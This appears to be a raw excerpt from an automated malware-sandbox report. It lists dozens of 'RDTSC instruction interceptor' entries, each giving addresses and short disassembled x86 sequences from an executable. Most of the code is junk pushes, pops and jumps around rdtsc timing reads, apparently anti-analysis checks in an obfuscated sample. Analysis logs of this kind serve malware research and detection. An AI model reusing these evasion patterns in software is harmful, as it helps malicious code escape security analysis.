Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B9B9 second address: 103B9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push edx 0x00000008 jnp 00007FF3408102F6h 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B9CE second address: 103B9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF34080AB06h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B9DC second address: 103B9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FF3408102F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103B9EA second address: 103B9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103D479 second address: 103D47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103D47D second address: 103D48C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 ja 00007FF34080AB06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 103D48C second address: 103D4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF340810300h 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 ja 00007FF3408102F6h 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 104393C second address: 104396B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB17h 0x00000009 jno 00007FF34080AB06h 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007FF34080AB06h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 104396B second address: 10439A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FF34081030Ch 0x0000000f jmp 00007FF340810306h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DC2 second address: 56F0DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DCD second address: 56F0DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esp 0x00000006 jmp 00007FF3408102FCh 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DE8 second address: 56F0DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DEC second address: 56F0DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DF0 second address: 56F0DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0DF6 second address: 56F0E34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FF3408102FEh 0x00000011 movzx ecx, di 0x00000014 pop ebx 0x00000015 push ecx 0x00000016 mov ebx, 3467B66Eh 0x0000001b pop edi 0x0000001c popad 0x0000001d pop ebp 0x0000001e pushad 0x0000001f movzx ecx, bx 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ah, dl 0x00000026 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 574007D second address: 5740083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5740083 second address: 57400C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF340810300h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF340810307h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D00F1 second address: 56D0115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF34080AB0Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0115 second address: 56D0174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF340810306h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF3408102FEh 0x00000018 sub si, E138h 0x0000001d jmp 00007FF3408102FBh 0x00000022 popfd 0x00000023 mov bh, cl 0x00000025 popad 0x00000026 push dword ptr [ebp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF3408102FEh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0174 second address: 56D01BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FF34080AB17h 0x0000000b sub cx, FC5Eh 0x00000010 jmp 00007FF34080AB19h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push dword ptr [ebp+0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D01BC second address: 56D01C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D01C0 second address: 56D01C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D01C6 second address: 56D01CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D01CC second address: 56D01D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0705 second address: 56F0721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810308h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0721 second address: 56F0752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF34080AB0Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF34080AB17h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0752 second address: 56F0758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0758 second address: 56F075C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F075C second address: 56F076C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F076C second address: 56F0770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0770 second address: 56F0776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0776 second address: 56F077F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E9E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F03CE second address: 56F0438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF3408102FEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 pushfd 0x00000015 jmp 00007FF3408102FDh 0x0000001a and ch, FFFFFFD6h 0x0000001d jmp 00007FF340810301h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF340810308h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0438 second address: 56F043C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F043C second address: 56F0442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F0442 second address: 56F046F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF34080AB17h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700163 second address: 57001AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, DCh 0x0000000d pushfd 0x0000000e jmp 00007FF340810301h 0x00000013 sub ecx, 0497E776h 0x00000019 jmp 00007FF340810301h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 mov eax, 3B3C9675h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57001AB second address: 57001BA instructions: 0x00000000 rdtsc 0x00000002 mov cx, 24F1h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57001BA second address: 57001BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730EF2 second address: 5730F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF34080AB17h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F20 second address: 5730F44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F44 second address: 5730F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F48 second address: 5730F62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810306h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F62 second address: 5730F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF34080AB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F74 second address: 5730F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730F78 second address: 5730F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF34080AB0Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710280 second address: 5710284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710284 second address: 57102A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102A1 second address: 57102B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102B1 second address: 57102B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102B5 second address: 57102D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF3408102FEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102D3 second address: 57102D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102D9 second address: 57102DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102DF second address: 57102E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57102E3 second address: 5710302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop ecx 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710302 second address: 5710329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF34080AB0Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710329 second address: 571032D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 571032D second address: 5710333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710333 second address: 5710344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710344 second address: 571037A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax], 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF34080AB18h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 571037A second address: 5710389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710389 second address: 571038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 571038F second address: 5710393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710393 second address: 57103E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF34080AB18h 0x00000015 xor si, D4E8h 0x0000001a jmp 00007FF34080AB0Bh 0x0000001f popfd 0x00000020 call 00007FF34080AB18h 0x00000025 pop esi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56F05D9 second address: 56F05E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700DE3 second address: 5700DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700DE8 second address: 5700DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700DF8 second address: 5700DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700DFC second address: 5700E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700E0B second address: 5700E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5700E24 second address: 5700E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57100D9 second address: 57100DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57100DF second address: 5710104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 jmp 00007FF3408102FDh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF3408102FCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5710104 second address: 571010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 571010A second address: 5710129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF340810304h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57307AD second address: 57307B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57307B1 second address: 57307B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57307B7 second address: 57307DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 880Fh 0x00000007 jmp 00007FF34080AB14h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movsx ebx, ax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57307DC second address: 5730812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a call 00007FF340810300h 0x0000000f pop ecx 0x00000010 popad 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730812 second address: 573083D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF34080AB14h 0x0000000a add ax, 71A8h 0x0000000f jmp 00007FF34080AB0Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 573083D second address: 5730843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730843 second address: 5730853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730853 second address: 5730859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730859 second address: 573085F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 573085F second address: 5730863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730863 second address: 5730875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dh, D4h 0x0000000e mov bx, si 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730875 second address: 57308C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c jmp 00007FF3408102FEh 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF340810307h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57308C1 second address: 57308C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57308C7 second address: 57308CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
